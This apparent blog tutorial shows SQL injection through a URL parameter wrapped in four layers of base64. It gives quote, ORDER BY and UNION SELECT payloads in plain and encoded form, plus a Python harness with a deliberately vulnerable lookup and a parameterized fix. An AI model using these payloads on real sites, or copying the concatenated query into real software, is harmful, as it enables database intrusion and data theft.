SQL Injection on Base64 Encoded String Parameters

This article walks through SQL injection on base64-encoded URL parameters. Developers sometimes encode a parameter this way believing it makes the site injection-proof. That is a myth: the server decodes the value before it reaches the query, so the encoding is just one more transformation the attacker applies to the payload.

Recently I came across URLs of this kind: "www.somesite.com/index.php?pid=VkRGRk9WQlJQVDA9". The pid value, VkRGRk9WQlJQVDA9, is nothing but the number 9 base64-encoded four times: decode it four times and you get 9.

Let's see how we can inject into such a URL parameter.
I am using http://www.utilities-online.info/base64/#.W8gPD4hX5PY to encode my injection strings to base64 four times.

First: since we know that VkRGRk9WQlJQVDA9 is 9, we append a single quote (9') and encode that four times, giving VkRGT2FsQlJQVDA9, to check whether the parameter produces a SQL error.

The page returned a database error, so this is a basic error-based SQL injection. From here on, all we need to do is encode each payload four times with base64 before putting it in pid.

9' order by 1-- -

Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1ERlVUVUhTU2xGNlFUaz0=

The page loaded correctly, which means the query has at least one column (ORDER BY n succeeds for every n up to the real column count, so this only gives a lower bound).

9' order by 4-- -

Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1EVkVUVUhTU2xGNlFUaz0=

The page loaded correctly again, so there are at least 4 columns.

Let's try 8:

9' order by 8-- -

Encoded: VkRGT2Fsb3lTWHBUYlhSaFYwVnNibGRYTlhKYU1EbEVUVUhTU2xGNlFUaz0=

This gave an error, so there are fewer than 8 columns.

Then I tried ORDER BY 7 and it worked.

So we now know the query has 7 columns.

Let's find out which columns are reflected in the page using a UNION query. The pid is set to -1 so the original row does not match and only the UNION row is displayed:

-1' UNION SELECT 1,2,3,4,5,6,7-- -

Encoded: VkVaU1JtSnJiRWRXYXpsVVZsUnNVRk5WV2s5U2JGSkdWbXRTVjFFd1JqUlVSVkpLWXpBeE5XUjZRazFTUmxaNlZHMXNNMDB3ZUZSTlIyUk5WVlF3T1E9PQ==

Some of the numbers from the UNION row appeared in the page, so we now know which columns are reflected and can be used to pull data out.

-1' union select 1,2,VERSION(),database(),5,6,7-- -

Encoded: VkVaU1JtSnJiRWxWYmxab1ZucHNNVk5WYUU5aVIwcElWbTF3YTFFd1JqUlVSVkpLWXpGYWNsWnNUbFpOUjNoUlZrZHNibU5GZUVoVmJXaHJVakJhY0ZkV2FFOWlSWFJFWVROT1QxVXpZM2xVUlZKcVpFVjRWRkZZVVQwPQ==

I have hidden the database name.

This is how SQL injection works on base64-encoded parameter values: the encoding changes nothing except the extra step of encoding each payload the same number of times the site does. I am stopping at the version query, but the same UNION injection can be used to enumerate tables and extract data just as on an unencoded parameter.
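As an added example (my harness, not code from the original post or from the target site), the Python below packages the whole walkthrough: a helper that applies and strips the four base64 layers, a depth estimator for a parameter whose layer count is unknown, and a small SQLite stand-in for the assumed server-side code, which decodes pid and concatenates it into the query, beside a parameterized version that the same payloads cannot break. The seven-column posts table, its column names and the SQLite backend are assumptions; MySQL's VERSION() and database() would be sqlite_version() here. The sample row is constructed.

```python
import base64
import sqlite3

# The page observed four base64 layers around the pid parameter.
LAYERS = 4


def encode_n(payload: str, n: int = LAYERS) -> str:
    """Base64-encode payload n times: the form the site expects pid in."""
    data = payload.encode()
    for _ in range(n):
        data = base64.b64encode(data)
    return data.decode()


def decode_n(value: str, n: int = LAYERS) -> str:
    """Peel n base64 layers off value: what the server does before querying."""
    data = value.encode()
    for _ in range(n):
        data = base64.b64decode(data, validate=True)
    return data.decode()


def base64_depth(value: str, limit: int = 16) -> int:
    """Estimate how many base64 layers wrap a parameter by decoding until the
    result is no longer valid base64 that yields printable ASCII. Heuristic:
    a plaintext that happens to be valid base64 (e.g. 'abcd') counts as one
    more layer, so confirm the guess by looking at the decoded value."""
    depth = 0
    data = value.encode()
    while depth < limit:
        try:
            decoded = base64.b64decode(data, validate=True)
            text = decoded.decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
            break
        if not text or not text.isprintable():
            break
        data, depth = decoded, depth + 1
    return depth


def build_db() -> sqlite3.Connection:
    """Constructed sample table with seven columns, the count the walkthrough
    found. SQLite stands in for the site's MySQL (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE posts (pid INTEGER, title TEXT, body TEXT, author TEXT, "
        "tags TEXT, created TEXT, views INTEGER)"
    )
    con.execute(
        "INSERT INTO posts VALUES (9, 'Hello', 'First post', 'admin', 'misc', "
        "'2018-10-01', 42)"
    )
    con.commit()
    return con


COLUMNS = "pid, title, body, author, tags, created, views"


def vulnerable_lookup(con: sqlite3.Connection, pid_param: str) -> list:
    """Assumed server logic behind index.php?pid=...: undo the four base64
    layers, then splice the result straight into the SQL string. The encoding
    is gone before the query is built, so it offers no protection at all."""
    pid = decode_n(pid_param)
    sql = f"SELECT {COLUMNS} FROM posts WHERE pid = '{pid}'"
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, pid_param: str) -> list:
    """Hardened version: same decoding, but the value is bound as a parameter,
    so quotes, ORDER BY and UNION fragments are compared as data, never parsed."""
    pid = decode_n(pid_param)
    sql = f"SELECT {COLUMNS} FROM posts WHERE pid = ?"
    return con.execute(sql, (pid,)).fetchall()


def probe(con: sqlite3.Connection, payload: str) -> str:
    """Encode a payload the way the site expects and report what the page would do."""
    try:
        rows = vulnerable_lookup(con, encode_n(payload))
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"
    return f"ok: {rows}"


def count_columns(con: sqlite3.Connection, max_cols: int = 20) -> int:
    """ORDER BY n probing: the largest n that does not error is the column count."""
    found = 0
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(con, encode_n(f"9' order by {n}-- -"))
        except sqlite3.OperationalError:
            break
        found = n
    return found


if __name__ == "__main__":
    con = build_db()
    print("depth of VkRGRk9WQlJQVDA9:", base64_depth("VkRGRk9WQlJQVDA9"))
    print("9'    ->", probe(con, "9'"))
    print("columns:", count_columns(con))
    union = "-1' UNION SELECT 1,2,3,4,5,6,7-- -"
    print("union ->", probe(con, union))
    print("safe  ->", safe_lookup(con, encode_n(union)))
```

Running it reproduces the page's numbers: encode_n("9") gives VkRGRk9WQlJQVDA9 and encode_n("9'") gives VkRGT2FsQlJQVDA9, the ORDER BY probe stops at 7, the UNION payload returns the marker row through vulnerable_lookup and nothing through safe_lookup. The fix is the parameterized query, not the encoding; a site that wants base64 in the URL can keep it, as long as the decoded value is bound rather than concatenated.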
